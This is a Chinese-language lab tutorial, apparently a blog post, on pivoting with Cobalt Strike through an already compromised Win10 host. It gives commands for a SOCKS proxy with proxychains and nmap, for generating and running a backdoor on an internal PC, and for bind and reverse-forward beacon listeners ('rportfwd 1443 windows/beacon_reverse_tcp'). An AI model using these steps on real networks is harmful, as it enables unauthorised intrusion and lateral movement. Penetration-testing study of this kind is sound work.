跳板攻击之:CS代理转发

跳板攻击之:CS代理转发

1 环境准备

1.1 环境拓扑

image-20220815192609737

1.2 前提

  1. 已经取得Win10控制权限

2 配置 Socks 代理

  1. 配置 Socks 代理,右击上线的Win10会话选择:代理转发 - Socks 代理

    socks 8888
    
    # 关闭 Socks 代理
    socks stop
    

    image-20220815190845033

  2. 在 Kali 主机上利用 proxychains 配合 Socks 代理通信

    # 配置 proxychains
    vim /etc/proxychains.conf
    socks4  127.0.0.1 8888
    
    # nmap 走 Socks 代理
    proxychains nmap -Pn -sT -p3389 10.0.0.8
    

    image-20220815191158038

3 配置转发监听器(正向连接)

  1. 新建监听器:r_forward_tcp

    image-20220815193321610

  2. 生成可执行(s)后门,监听器选择转发监听器

    image-20220815194131891

  3. 将生成的Payload复制到内网PC,并执行

  4. 在Win10交互会话上输入以下命令,用于监听反弹会话:

    connect 10.0.0.8 4433
    
    • :外网Win10防火墙上要放行4433端口

      image-20220815194621388

  5. 成功上线内网PC

    image-20220815194821564

4 配置转发上线(反向连接)

注:反向连接需要考虑防火墙放行端口问题

  1. 选择 Win10 会话,右击选择:代理转发-转发上线(Listener),这里的转发监听器就相当于 Win10 作为一个代理,将流量转发至外网。

    # 监听地址应配置内网 IP
    rportfwd 1443 windows/beacon_reverse_tcp
    
    • 监听地址一定要是内网的IP

      image-20220815192420240

  2. 生成可执行(s)后门,监听器选择转发监听器

    image-20220815192032160

  3. 将生成的Payload复制到内网PC,并执行,成功上线

    image-20220815193031312

posted @ 2022-08-16 10:11  f_carey  阅读(883)  评论(3编辑  收藏  举报